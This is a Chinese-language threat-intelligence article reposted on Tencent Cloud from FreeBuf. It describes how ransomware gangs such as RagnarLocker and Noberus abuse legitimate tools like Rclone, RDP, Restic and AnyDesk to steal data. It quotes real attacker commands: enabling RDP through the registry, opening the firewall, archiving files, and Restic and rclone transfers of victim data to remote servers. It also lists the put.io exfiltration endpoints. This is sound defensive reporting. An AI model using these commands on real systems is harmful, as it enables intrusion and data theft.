前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >分析发现勒索软件数据泄露主要依靠滥用合法软件

分析发现勒索软件数据泄露主要依靠滥用合法软件

作者头像
FB客服
发布2024-04-01 14:07:12
2050
发布2024-04-01 14:07:12
举报
文章被收录于专栏:FreeBuf

勒索软件团伙在攻击中使用了越来越多的数据泄露工具,赛门铁克在三个月内就发现了十几种不同的工具进行数据泄露。虽然其中一些工具是恶意软件,但绝大多数都是合法软件。

现在大多数勒索软件运营商都会使用双重勒索进行攻击。除了加密文件外,攻击者也会从受害者处窃取数据并威胁受害者泄露数据。该策略已经被一再证明有效,为攻击者提供了更多的敲诈资本,对付那些能够从备份中恢复数据的组织。

勒索软件团伙应用数据泄露工具的范围正在扩大,主要驱动因素有两个:

  • 攻击者意识到了某些软件的潜在功能可以利用
  • 攻击者希望找到过于显眼的攻击工具的替代品

尽管 Rclone 目前仍然是勒索软件团伙最常用的数据泄露工具,但远程管理类软件的增速最快,例如 AnyDesk、ScreenConnect 和 Atera。数据泄露只是这些良性软件的功能之一,大多数软件都可以变成访问失陷主机的后门。

勒索软件团伙与数据泄露工具

在过去三个月中,攻击者最常用的数据泄露工具如下所示:

  • Rclone:Rclone 是管理云上数据内容的开源工具,经常被勒索软件团伙用于窃取数据。
  • AnyDesk:AnyDesk 是合法的远程管理软件,攻击者可以远程访问失陷主机。
  • RDP:远程桌面协议,使攻击者可以连接到并控制另一台计算机。

例如,攻击者可以通过简单修改注册表来启用 RDP:

代码语言:javascript
复制
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

攻击者还可以创建防火墙规则,通过 netsh 命令允许 RDP 连接:

代码语言:javascript
复制
netsh advfirewall firewall add rule name=[NAME] RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
  • Cobalt Strike:可以执行命令、注入进程、提升权限。该工具可以作为合法渗透测试工具使用,但被各种攻击者滥用。攻击者利用 Cobalt Strike 的 Beacon 与失陷主机建立通信,支持攻击者秘密地泄露敏感数据。工具模拟正常的网络流量并和正常的网络流量混合在一起,攻击者就可以外传有价值的数据。
  • ConnectWise:远程桌面管理工具,用于实现对失陷主机的远程访问。
  • Atera:攻击者经常滥用的合法远程访问软件。
  • WinRAR:用于压缩和解压的软件,攻击者使用此类软件压缩回传的数据。
代码语言:javascript
复制
cmd /u [REMOVED] CSIDL_COMMON_APPDATA\rar.exe a -dh -hp[REMOVED] -m5 CSIDL_COMMON_APPDATA\1.rar CSIDL_COMMON_APPDATA\1.txt > CSIDL_COMMON_APPDATA\log.txt
  • Restic:开源备份工具,适用于各种平台(Windows、Linux 和 OSX)。Restic 支持各种存储后端,包括本地文件系统、SFTP 服务器、Amazon S3、Microsoft Azure 和 Google Cloud Storage 等。

Noberus 勒索软件使用的 Restic 命令如下所示,各种命令回传数据:

代码语言:javascript
复制
CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ init [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt
CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt --use-fs-snapshot --verbose backup "CSIDL_SYSTEM_DRIVE\[REMOVED]"
  • TightVNC:开源远程管理软件。
  • WinSCP:Windows 平台下 SFTP/FTP 客户端。
  • Pandora RC:从前被称为 eHorus 的合法远程管理工具,
  • Chisel:开源代理工具,能够创建加密隧道。攻击者创建从失陷主机到攻击基础设施的隧道,通过 HTTP 传输并通过 SSH 进行加密。
  • PowerShell:在各种勒索软件攻击行动中常被攻击者使用的脚本工具,包括 Compress-Archive cmdlet:
代码语言:javascript
复制
powershell Compress-Archive CSIDL_PROFILE\public\[REMOVED]-fs CSIDL_PROFILE\public\[REMOVED]-fs.zip

案例研究:RagnarLocker 使用 Rclone

Rclone 是管理云中数据内容的开源工具,攻击者利用该工具从失陷主机窃取数据。勒索软件团伙现在非常频繁地使用 Rclone,攻击者也开始重命名伪装成其他工具。

2023 年 7 月,RagnarLocker 勒索软件团伙使用了 Rclone。首先,攻击者执行 PowerShell 命令以禁用 LSA 机制。然后,攻击者运行了 SoftPerfect Network Scanner 检测发现主机名和网络服务。

第二天,攻击者部署了 Mimikatz 和 LaZagne 来转储凭据并且收集系统信息、保存注册表配置、执行远程命令,启用了 RDP 协议以便远程访问。最后,攻击者使用 Rclone 获取数据:

代码语言:javascript
复制
rclone copy \\[REMOVED]\[REMOVED]\Shares --max-age 2095d [REMOVED]:[REMOVED]/ -P --exclude "*.{zip,log,rar,wav,mp4,mpeg}" --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6

有趣的是,攻击者的命令中有许多错误,这说明攻击者是手动输入命令执行而非自动化执行。攻击者启用了文件共享服务 put.io 作为 Rclone 的连接,回传泄露的数据:

  • https://api.put[.]io
  • https://s100.put[.]io
  • https://s101.put[.]io
  • https://s102.put[.]io
  • https://s103.put[.]io
  • https://upload.put[.]io

数据被泄露后,攻击者进入攻击的下一阶段,开始部署 RagnarLocker。

逃避检测

对大多数勒索软件团伙来说,数据泄露是攻击链中的关键步骤。攻击者创建了暗网数据泄露网站,发布不支付赎金的受害者的被窃数据。有能力的攻击者自研恶意软件,但也有攻击者选择转向使用合法软件,这样避免触发告警。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-03-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云服务器
云服务器(Cloud Virtual Machine,CVM)提供安全可靠的弹性计算服务。 您可以实时扩展或缩减计算资源,适应变化的业务需求,并只需按实际使用的资源计费。使用 CVM 可以极大降低您的软硬件采购成本,简化 IT 运维工作。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档